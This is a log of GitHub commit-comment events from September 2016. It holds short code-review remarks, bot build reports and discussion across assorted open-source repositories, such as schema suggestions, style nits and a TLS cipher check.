{"id":"4570386499","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19043496,"position":5,"line":46,"path":"band-web/src/main/webapp/publicbandprofile.xhtml","commit_id":"11e1a3c89eef1a6c57a74044e3e38be92dd5f4c2","created_at":"2016-09-15T20:02:56Z","updated_at":"2016-09-15T20:02:56Z","body":"Why? It's above a calendar."}},"created_at":"2016-09-15T20:02:56Z"}
{"id":"4570388580","type":"CommitCommentEvent","actor":{"login":"seanlynch"},"repo":{"name":"david415/ipfs-onion-transport"},"payload":{"comment":{"id":19043498,"position":23,"line":69,"path":"onion_transport.go","commit_id":"a7378ff732b5ab1091574505b1b1845b72cafcd9","created_at":"2016-09-15T20:03:22Z","updated_at":"2016-09-15T20:03:22Z","body":"Pretty sure keysDir is not key material based on how you're using it in the function & its name."}},"created_at":"2016-09-15T20:03:22Z"}
{"id":"4570392819","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043511,"position":7,"line":7,"path":"server/db/models/cart.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T20:04:07Z","updated_at":"2016-09-15T20:04:07Z","body":"Extract the JSON fields and make columns for the carts table? Or add new tables? JSON is usually for very dynamic, changing structures. I think your items are probably pretty consistent, structure-wise."}},"created_at":"2016-09-15T20:04:07Z"}
{"id":"4570395728","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19043519,"position":null,"line":null,"path":null,"commit_id":"ca2e4c00205a353cd6e6e5245e51b8dc1c0cfa91","created_at":"2016-09-15T20:04:40Z","updated_at":"2016-09-15T20:04:40Z","body":"It's not a bottom of navigation dock but bottom of measurement dock.\r\nI don't think that both of these locations are good, because vertical resolution of most of displays could be insufficient to display whole navigation dock + description. I would prefer to have as a Description tab in Fractal dock. I would add also popup window with this text when settings file with description is loaded."}},"created_at":"2016-09-15T20:04:40Z"}
{"id":"4570396811","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043524,"position":9,"line":9,"path":"server/db/models/man.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T20:04:52Z","updated_at":"2016-09-15T20:04:52Z","body":"`STRING` is ~255 chars, maybe `TEXT` makes more sense?"}},"created_at":"2016-09-15T20:04:52Z"}
{"id":"4570397007","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19043525,"position":13,"line":13,"path":"src/Board.h","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T20:04:54Z","updated_at":"2016-09-15T20:04:54Z","body":"Destructor virtual"}},"created_at":"2016-09-15T20:04:54Z"}
{"id":"4570397781","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19043526,"position":730,"line":7032,"path":"src/game/SpellEffects.cpp","commit_id":"839ffa6cc212757faa6448c544b514db2f6aae1a","created_at":"2016-09-15T20:05:04Z","updated_at":"2016-09-15T20:05:04Z","body":"Can you explain why you reverted this? It disables using creature_template_addon  for pets again"}},"created_at":"2016-09-15T20:05:04Z"}
{"id":"4570398453","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":19043528,"position":null,"line":null,"path":null,"commit_id":"1547c751aa48efe7dbefef701c3df5983b04aa2e","created_at":"2016-09-15T20:05:09Z","updated_at":"2016-09-15T20:05:09Z","body":"OK, good call @Narretz "}},"created_at":"2016-09-15T20:05:09Z"}
{"id":"4570398323","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19043529,"position":8,"line":14,"path":"app/core/Router.php","commit_id":"4b8f99c793ac885d9c92b24541864f1131bce142","created_at":"2016-09-15T20:05:11Z","updated_at":"2016-09-15T20:05:11Z","body":"все это херня :) "}},"created_at":"2016-09-15T20:05:11Z"}
{"id":"4570399193","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043533,"position":13,"line":13,"path":"server/db/models/tear.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T20:05:19Z","updated_at":"2016-09-15T20:05:19Z","body":"Probably this is a good candidate for `Sequelize.ENUM`"}},"created_at":"2016-09-15T20:05:19Z"}
{"id":"4570400464","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043536,"position":16,"line":16,"path":"server/db/models/tear.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T20:05:34Z","updated_at":"2016-09-15T20:05:34Z","body":"`.BOOLEAN`"}},"created_at":"2016-09-15T20:05:34Z"}
{"id":"4570402495","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19043541,"position":14,"line":20,"path":"app/core/Router.php","commit_id":"4b8f99c793ac885d9c92b24541864f1131bce142","created_at":"2016-09-15T20:05:56Z","updated_at":"2016-09-15T20:05:56Z","body":"не нужно делать никаких `require`\r\nдля этого у нас есть `composer` с его `autoload.php`"}},"created_at":"2016-09-15T20:05:56Z"}
{"id":"4570403118","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043542,"position":29,"line":29,"path":"server/db/models/tear.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T20:06:03Z","updated_at":"2016-09-15T20:06:03Z","body":"`description`"}},"created_at":"2016-09-15T20:06:03Z"}
{"id":"4570406732","type":"CommitCommentEvent","actor":{"login":"johardi"},"repo":{"name":"protegeproject/mapping-master"},"payload":{"comment":{"id":19043556,"position":5,"line":61,"path":"src/main/java/org/mm/core/ReferenceType.java","commit_id":"cde136508ed5d0edc96d73fcdddaa1bdcfed710b","created_at":"2016-09-15T20:06:42Z","updated_at":"2016-09-15T20:06:42Z","body":"It didn't compile the grammar if I used only IRI"}},"created_at":"2016-09-15T20:06:42Z"}
{"id":"4570412460","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19043579,"position":16,"line":47,"path":"static/js/services/select2-search.js","commit_id":"03aad82442f821663360cdbe8cfad4c3f3538855","created_at":"2016-09-15T20:07:40Z","updated_at":"2016-09-15T20:07:40Z","body":"Really? It broke like 3 or 4 style guidelines, not including breaking my heart...\r\n\r\nIf you want to be really cool, pull out a MAP_IDENTITY constant and use that!"}},"created_at":"2016-09-15T20:07:40Z"}
{"id":"4570413272","type":"CommitCommentEvent","actor":{"login":"AlessiaDrG"},"repo":{"name":"AlessiaDrG/hello-world"},"payload":{"comment":{"id":19043586,"position":null,"line":null,"path":null,"commit_id":"e87c26cdeec2410081cd2fec3044fc1377e9a8c6","created_at":"2016-09-15T20:07:49Z","updated_at":"2016-09-15T20:07:49Z","body":"i would move line 3 in position 2"}},"created_at":"2016-09-15T20:07:49Z"}
{"id":"4570414516","type":"CommitCommentEvent","actor":{"login":"seanlynch"},"repo":{"name":"david415/ipfs-onion-transport"},"payload":{"comment":{"id":19043588,"position":88,"line":127,"path":"onion_transport.go","commit_id":"a7378ff732b5ab1091574505b1b1845b72cafcd9","created_at":"2016-09-15T20:08:04Z","updated_at":"2016-09-15T20:08:04Z","body":"Minor nit: seems like a blank line after the function prototype is not the style in the rest of this file."}},"created_at":"2016-09-15T20:08:04Z"}
{"id":"4570415668","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19043590,"position":null,"line":null,"path":null,"commit_id":"18acc29bdc0564c2902024eac27b601568bc5fd7","created_at":"2016-09-15T20:08:17Z","updated_at":"2016-09-15T20:08:17Z","body":"there @aldenml  :)"}},"created_at":"2016-09-15T20:08:17Z"}
{"id":"4570420825","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19043601,"position":24,"line":79,"path":"static/js/services/select2-search.js","commit_id":"03aad82442f821663360cdbe8cfad4c3f3538855","created_at":"2016-09-15T20:09:14Z","updated_at":"2016-09-15T20:09:14Z","body":"It confused my poor brain about whether it was returning a promise, or maybe doing something else if the `currentQuery !== params.data.q`. I'm easy either way but I found this easier to read when I was trying to work out what was going on."}},"created_at":"2016-09-15T20:09:14Z"}
{"id":"4570425383","type":"CommitCommentEvent","actor":{"login":"59azul"},"repo":{"name":"59azul/projetos_faculdade"},"payload":{"comment":{"id":19043607,"position":null,"line":null,"path":null,"commit_id":"23f07d034a124db9ecec4dc0e3e986eb24fdb793","created_at":"2016-09-15T20:10:03Z","updated_at":"2016-09-15T20:10:03Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DYiAMe9k&#x2F;24-projeto-1-poo\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Projeto 1 - POO</a>"}},"created_at":"2016-09-15T20:10:03Z"}
{"id":"4570426350","type":"CommitCommentEvent","actor":{"login":"marcelstoer"},"repo":{"name":"DiUS/nodemcu-firmware"},"payload":{"comment":{"id":19043611,"position":null,"line":null,"path":null,"commit_id":"0cb7b7dc92d5ac575eb9d52a883c151440350806","created_at":"2016-09-15T20:10:15Z","updated_at":"2016-09-15T20:10:15Z","body":"Nice we'll get TLS1.2 with this version.\r\n\r\n```lua\r\nhttp.get(\"https://www.howsmyssl.com/a/check\", nil, function(code, data)\r\n    if (code < 0) then\r\n      print(\"HTTP request failed\")\r\n    else\r\n      print(code, data)\r\n    end\r\n  end)\r\n```\r\n\r\nreports\r\n\r\n```json\r\n{\r\n\t\"given_cipher_suites\": [\r\n\t  \"TLS_RSA_WITH_AES_256_CBC_SHA256\", \r\n\t  \"TLS_RSA_WITH_AES_256_CBC_SHA\", \r\n\t  \"TLS_RSA_WITH_AES_128_CBC_SHA256\", \r\n\t  \"TLS_RSA_WITH_AES_128_CBC_SHA\", \r\n\t  \"TLS_RSA_PSK_WITH_AES_256_CBC_SHA384\", \r\n\t  \"TLS_RSA_PSK_WITH_AES_256_CBC_SHA\", \r\n\t  \"TLS_RSA_PSK_WITH_AES_128_CBC_SHA256\", \r\n\t  \"TLS_RSA_PSK_WITH_AES_128_CBC_SHA\", \r\n\t  \"TLS_EMPTY_RENEGOTIATION_INFO_SCSV\"],\r\n\t\"ephemeral_keys_supported\": false, // bad\r\n\t\"session_ticket_supported\": false, // bad\r\n\t\"tls_compression_supported\": false, // good\r\n\t\"unknown_cipher_suite_supported\": false, // good\r\n\t\"beast_vuln\": false, // good\r\n\t\"able_to_detect_n_minus_one_splitting\": false,\r\n\t\"insecure_cipher_suites\": {}, // good\r\n\t\"tls_version\": \"TLS 1.2\",\r\n\t\"rating\": \"Improvable\" // an improvement, our axTLS-based rating is 'bad'\r\n}\r\n```\r\n\r\n(comments are mine)"}},"created_at":"2016-09-15T20:10:15Z"}
{"id":"4570427141","type":"CommitCommentEvent","actor":{"login":"59azul"},"repo":{"name":"59azul/projetos_faculdade"},"payload":{"comment":{"id":19043616,"position":null,"line":null,"path":null,"commit_id":"e02ef0e3f51bca87d2aa845f60b163b470005b7e","created_at":"2016-09-15T20:10:21Z","updated_at":"2016-09-15T20:10:21Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DYiAMe9k&#x2F;24-projeto-1-poo\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Projeto 1 - POO</a>"}},"created_at":"2016-09-15T20:10:21Z"}
{"id":"4570427200","type":"CommitCommentEvent","actor":{"login":"59azul"},"repo":{"name":"59azul/projetos_faculdade"},"payload":{"comment":{"id":19043617,"position":null,"line":null,"path":null,"commit_id":"23f07d034a124db9ecec4dc0e3e986eb24fdb793","created_at":"2016-09-15T20:10:22Z","updated_at":"2016-09-15T20:10:22Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DYiAMe9k&#x2F;24-projeto-1-poo\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Projeto 1 - POO</a>"}},"created_at":"2016-09-15T20:10:22Z"}
{"id":"4570427318","type":"CommitCommentEvent","actor":{"login":"ardaozkal"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":19043618,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-15T20:10:23Z","updated_at":"2016-09-15T20:10:23Z","body":"Ok, jung. \r\n\r\nThe last few years where we could use VacStatus was fun, thanks for developing it. "}},"created_at":"2016-09-15T20:10:23Z"}
{"id":"4570428487","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19043623,"position":7,"line":88,"path":"tests/protractor/e2e/send-message.js","commit_id":"03aad82442f821663360cdbe8cfad4c3f3538855","created_at":"2016-09-15T20:10:35Z","updated_at":"2016-09-15T20:10:35Z","body":"Yeah because the new modal style means the element doesn't exist until it's opened. I didn't test it but I assume that'd break because it can't find the element to determine if it's displayed or not. I could add it back with `.isPresent()` if you like?"}},"created_at":"2016-09-15T20:10:35Z"}
{"id":"4570431943","type":"CommitCommentEvent","actor":{"login":"mclandlord"},"repo":{"name":"WPossidento/PetMinder"},"payload":{"comment":{"id":19043632,"position":null,"line":null,"path":null,"commit_id":"0e1b582ed4ad222d59973ea73701ead58b595fbc","created_at":"2016-09-15T20:11:14Z","updated_at":"2016-09-15T20:11:14Z","body":"This commit fixes the AddAnimalType method to reload the Table View and blank out the input text field after the type is added"}},"created_at":"2016-09-15T20:11:14Z"}
{"id":"4570432529","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19043636,"position":14,"line":89,"path":"tests/protractor/e2e/send-message.js","commit_id":"03aad82442f821663360cdbe8cfad4c3f3538855","created_at":"2016-09-15T20:11:19Z","updated_at":"2016-09-15T20:11:19Z","body":"Oooh. Good catch. I'll chain them up."}},"created_at":"2016-09-15T20:11:19Z"}
{"id":"4570434927","type":"CommitCommentEvent","actor":{"login":"mingflifb"},"repo":{"name":"facebook/facebook-ios-sdk"},"payload":{"comment":{"id":19043641,"position":null,"line":null,"path":null,"commit_id":"4b4bd9504d70d99d6c6b1ca670f486ac8f494f17","created_at":"2016-09-15T20:11:43Z","updated_at":"2016-09-15T20:11:43Z","body":"We don't have an open issues tab, bugs should go to developers.facebook.com/bugs.\r\n\r\n4.15.1 is an update to 4.15.0 for XCode 8 GM and iOS 10, see our changelogs here: https://developers.facebook.com/docs/ios/change-log-4.x/"}},"created_at":"2016-09-15T20:11:43Z"}
{"id":"4570446967","type":"CommitCommentEvent","actor":{"login":"cviebrock"},"repo":{"name":"oozotv/eloquent-sluggable"},"payload":{"comment":{"id":19043669,"position":null,"line":null,"path":null,"commit_id":"ffa6cc4f162456eef144d228a8837812f7aac7c0","created_at":"2016-09-15T20:13:56Z","updated_at":"2016-09-15T20:13:56Z","body":"Out of curiousity, what did you need to change that caused you fork the project?  Anything I can merge back into the main package?"}},"created_at":"2016-09-15T20:13:56Z"}
{"id":"4570447131","type":"CommitCommentEvent","actor":{"login":"zLade"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":19043671,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-15T20:13:58Z","updated_at":"2016-09-15T20:13:58Z","body":"Is it possible to give my list plz :( ?"}},"created_at":"2016-09-15T20:13:58Z"}
{"id":"4570447414","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19043672,"position":null,"line":null,"path":null,"commit_id":"f3d833c73da9e062d4a904c4e13e90e68b28ddfd","created_at":"2016-09-15T20:14:01Z","updated_at":"2016-09-15T20:14:01Z","body":"saw approval from JeetKunDoug\nat https://github.com/basho/riak_core/commit/f3d833c73da9e062d4a904c4e13e90e68b28ddfd"}},"created_at":"2016-09-15T20:14:01Z"}
{"id":"4570447500","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19043673,"position":null,"line":null,"path":null,"commit_id":"f3d833c73da9e062d4a904c4e13e90e68b28ddfd","created_at":"2016-09-15T20:14:02Z","updated_at":"2016-09-15T20:14:02Z","body":"merging basho/riak_core/fd-revert-caps-cherrypick = f3d833c7 into borshop-integration-858-fd-revert-caps-cherrypick"}},"created_at":"2016-09-15T20:14:02Z"}
{"id":"4570447565","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19043674,"position":null,"line":null,"path":null,"commit_id":"f3d833c73da9e062d4a904c4e13e90e68b28ddfd","created_at":"2016-09-15T20:14:03Z","updated_at":"2016-09-15T20:14:03Z","body":"basho/riak_core/fd-revert-caps-cherrypick = f3d833c7 merged ok, testing candidate = 3e66cd4f"}},"created_at":"2016-09-15T20:14:03Z"}
{"id":"4570450288","type":"CommitCommentEvent","actor":{"login":"fottua"},"repo":{"name":"fottua/json"},"payload":{"comment":{"id":19043675,"position":null,"line":null,"path":null,"commit_id":"fe2e897fb9d4a1c0b146490ecc33a3d1a17f7285","created_at":"2016-09-15T20:14:33Z","updated_at":"2016-09-15T20:14:33Z","body":"1"}},"created_at":"2016-09-15T20:14:33Z"}
{"id":"4570450850","type":"CommitCommentEvent","actor":{"login":"ohnx"},"repo":{"name":"nu-dev/libnucommon"},"payload":{"comment":{"id":19043677,"position":null,"line":null,"path":null,"commit_id":"c4f061c897e17dfda3e8003a7357b0108011f14d","created_at":"2016-09-15T20:14:39Z","updated_at":"2016-09-15T20:14:39Z","body":"oh my gosh you silly person...\r\n\r\nthere's a reason why you use calloc instead..."}},"created_at":"2016-09-15T20:14:39Z"}
{"id":"4570451141","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19043679,"position":206,"line":208,"path":"src/game/PetHandler.cpp","commit_id":"839ffa6cc212757faa6448c544b514db2f6aae1a","created_at":"2016-09-15T20:14:42Z","updated_at":"2016-09-15T20:14:42Z","body":"Also what is reason for this. "}},"created_at":"2016-09-15T20:14:42Z"}
{"id":"4570451530","type":"CommitCommentEvent","actor":{"login":"jrief"},"repo":{"name":"divio/djangocms-text-ckeditor"},"payload":{"comment":{"id":19043681,"position":null,"line":null,"path":null,"commit_id":"84a6c0aa842a5d71b168bdb70036f6cb546438ae","created_at":"2016-09-15T20:14:46Z","updated_at":"2016-09-15T20:14:46Z","body":"Thanks!\r\nToday I struggled myself and then moved back to version 3.0.1, which is working.\r\nDoes this patch really fix it?"}},"created_at":"2016-09-15T20:14:46Z"}
{"id":"4570456509","type":"CommitCommentEvent","actor":{"login":"samueltardieu"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19043700,"position":null,"line":null,"path":null,"commit_id":"61fbe4e3ccff5becc20c505a45aaf46a5d19dc82","created_at":"2016-09-15T20:15:39Z","updated_at":"2016-09-15T20:15:39Z","body":"Silently fail if the user has explicitly requested to remove the permission. When we update to API 23, we will request every permission we need, this will be presented to the user (unless it requested that it is no longer requested anymore).\r\n\r\nI think this is the proper thing to do here. Indeed it will be hard to diagnose, but cgeo is perfectly usable without having the user permission (for searching and logging for example)."}},"created_at":"2016-09-15T20:15:39Z"}
{"id":"4570461428","type":"CommitCommentEvent","actor":{"login":"ardaozkal"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":19043719,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-15T20:16:32Z","updated_at":"2016-09-15T20:16:32Z","body":"@zLade what do you have different from others? I'm a donor and even I'm not complaining."}},"created_at":"2016-09-15T20:16:32Z"}
{"id":"4570463185","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19043730,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-15T20:16:51Z","updated_at":"2016-09-15T20:16:51Z","body":"I believe the AVR Studio IDE has memory maps of the AVR hidden deep inside them somewhere.\r\nI extracted them once a long time ago (maybe 2013?) you can [find them here](https://www.dropbox.com/s/3xg3qgfjs6ds4y1/AVR_devices.zip?dl=0).\r\nUnfortunately I forgot how exactly I extracted these files, so they are not up-to-date."}},"created_at":"2016-09-15T20:16:51Z"}
{"id":"4570473664","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19043791,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-15T20:18:39Z","updated_at":"2016-09-15T20:18:39Z","body":"Also shameful self-plugging, but [I researched this too](http://blog.xpcc.io/2015/02/25/typesafe-register-access-in-c++/) and found a bunch of different implementation approaches ;-P"}},"created_at":"2016-09-15T20:18:39Z"}
{"id":"4570474877","type":"CommitCommentEvent","actor":{"login":"xleclercq"},"repo":{"name":"CodeSmithyIDE/CodeSmithy"},"payload":{"comment":{"id":19043800,"position":null,"line":null,"path":null,"commit_id":"236ffdc7157d1aa16c6100efa2983de1088d96cb","created_at":"2016-09-15T20:18:53Z","updated_at":"2016-09-15T20:18:53Z","body":"#7 "}},"created_at":"2016-09-15T20:18:53Z"}
{"id":"4570481352","type":"CommitCommentEvent","actor":{"login":"rhuss"},"repo":{"name":"arun-gupta/kubernetes-java-sample"},"payload":{"comment":{"id":19043827,"position":null,"line":null,"path":null,"commit_id":"5e89410f3a068eac2cfde71dec6e4ac5bd7f2c44","created_at":"2016-09-15T20:20:02Z","updated_at":"2016-09-15T20:20:02Z","body":"you should also remove the property <docker.image> which is a *filter* applied to the configured images (which luckily match here but is really not necessary)"}},"created_at":"2016-09-15T20:20:02Z"}
{"id":"4570484990","type":"CommitCommentEvent","actor":{"login":"kevinlekiller"},"repo":{"name":"kevinlekiller/amdctl"},"payload":{"comment":{"id":19043867,"position":null,"line":null,"path":null,"commit_id":"4e50f14d2dcf2bd0a9b7dfcfb584e05083ea5521","created_at":"2016-09-15T20:20:41Z","updated_at":"2016-09-15T20:20:41Z","body":"Oops, I meant #5"}},"created_at":"2016-09-15T20:20:41Z"}
{"id":"4570488829","type":"CommitCommentEvent","actor":{"login":"Salvi6God"},"repo":{"name":"egonSchiele/grokking_algorithms"},"payload":{"comment":{"id":19043883,"position":1,"line":1,"path":"04_quicksort/ruby/05_quicksort.rb","commit_id":"33d432bdaf421d78af2bb688ad7bb62219e6c5ad","created_at":"2016-09-15T20:21:20Z","updated_at":"2016-09-15T20:21:20Z","body":"isn't this implementation of quicksort's runtime O(n^2) all the time?\r\n\r\nI included another way of implementing quicksort that will on average give us O(n * log n). \r\n`\r\nclass Array\r\n  #  O(n * log n) implementation\r\n  def quicksort\r\n    return [] if empty?\r\n\r\n    pivot = delete_at(rand(size))\r\n\r\n    left, right = partition(&pivot.method(:>))\r\n\r\n    return *left.quicksort, pivot, *right.quicksort\r\n  end\r\nend\r\n`"}},"created_at":"2016-09-15T20:21:20Z"}
{"id":"4570492977","type":"CommitCommentEvent","actor":{"login":"son081194"},"repo":{"name":"son081194/Tears-Rose"},"payload":{"comment":{"id":19043904,"position":null,"line":null,"path":null,"commit_id":"d402b4d451032fe15e2c856a1f1a459d4dfbbe82","created_at":"2016-09-15T20:22:01Z","updated_at":"2016-09-15T20:22:01Z","body":"d402b4d"}},"created_at":"2016-09-15T20:22:01Z"}
{"id":"4570494540","type":"CommitCommentEvent","actor":{"login":"jeffkaufman"},"repo":{"name":"pagespeed/ngx_pagespeed"},"payload":{"comment":{"id":19043913,"position":null,"line":null,"path":null,"commit_id":"8bf48ac77d7ba92487ce57a54e1c82bd36168a50","created_at":"2016-09-15T20:22:18Z","updated_at":"2016-09-15T20:22:18Z","body":"I fixed this for 1.11.33.4 by back porting 4e2eb3de85"}},"created_at":"2016-09-15T20:22:18Z"}
{"id":"4570502856","type":"CommitCommentEvent","actor":{"login":"DreamStar001"},"repo":{"name":"TeamButter/android_kernel_motorola_athene_vegito"},"payload":{"comment":{"id":19043956,"position":null,"line":null,"path":null,"commit_id":"a88392da580655ade2efb144686cbae2ee190c5d","created_at":"2016-09-15T20:23:47Z","updated_at":"2016-09-15T20:23:47Z","body":":3 "}},"created_at":"2016-09-15T20:23:47Z"}
{"id":"4570508739","type":"CommitCommentEvent","actor":{"login":"nirvdrum"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19043972,"position":66,"line":66,"path":"truffle/src/main/java/org/jruby/truffle/core/rope/NativeRope.java","commit_id":"58e79d5c48a6bd4135b59bf8701e4693b95a11f2","created_at":"2016-09-15T20:24:51Z","updated_at":"2016-09-15T20:24:51Z","body":"Is this pointer only used for reads? If not, the `byteLength` and `characterLength` values can get out of sync. We have this problem with `RopeBuffer`, for instance."}},"created_at":"2016-09-15T20:24:51Z"}
{"id":"4570510216","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19043984,"position":null,"line":null,"path":null,"commit_id":"e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff","created_at":"2016-09-15T20:25:08Z","updated_at":"2016-09-15T20:25:08Z","body":"ASIHPValidation (shenb) - x86_64-MacOS-10.9-clang: OK (2327 of 2328 tests passed, 21 test warnings)\n\n * 22 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T20:25:08Z"}
{"id":"4570512904","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19043991,"position":2,"line":2,"path":"omod/src/main/webapp/resources/htmlforms/Vaccination.xml","commit_id":"d552abd49e3549524518779e1ebe2d46d1142280","created_at":"2016-09-15T20:25:35Z","updated_at":"2016-09-15T20:25:35Z","body":"@jamesfeshner these lines are very crucial to make sure our forms are created well with right properties, please make sure you don't copy paste from your local environment to these files, just modify them line after line not to bring in this confusion. Am skipping your commit to make sure we do this rightly, am going to reset this commit and please instead use pull requests so that i can review first and make it easy to resolve merge conflicts now that we are contributing to the same module together"}},"created_at":"2016-09-15T20:25:35Z"}
{"id":"4570513163","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19043992,"position":null,"line":null,"path":null,"commit_id":"f3d833c73da9e062d4a904c4e13e90e68b28ddfd","created_at":"2016-09-15T20:25:37Z","updated_at":"2016-09-15T20:25:37Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_core/builds/2083\n"}},"created_at":"2016-09-15T20:25:37Z"}
{"id":"4570517035","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19044001,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-15T20:26:19Z","updated_at":"2016-09-15T20:26:19Z","body":"Thanks again @xyyx http://gerrit.dirtyunicorns.com/#/q/status:open+topic:%22Dashboard+options%22"}},"created_at":"2016-09-15T20:26:19Z"}
{"id":"4570519825","type":"CommitCommentEvent","actor":{"login":"fadushin"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19044011,"position":null,"line":null,"path":null,"commit_id":"f3d833c73da9e062d4a904c4e13e90e68b28ddfd","created_at":"2016-09-15T20:26:46Z","updated_at":"2016-09-15T20:26:46Z","body":"@borshop merge"}},"created_at":"2016-09-15T20:26:46Z"}
{"id":"4570520082","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044012,"position":12,"line":12,"path":"server/app/routes/login.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T20:26:49Z","updated_at":"2016-09-15T20:26:49Z","body":"Maybe use `user.sanitize()` or define your own instance method?"}},"created_at":"2016-09-15T20:26:49Z"}
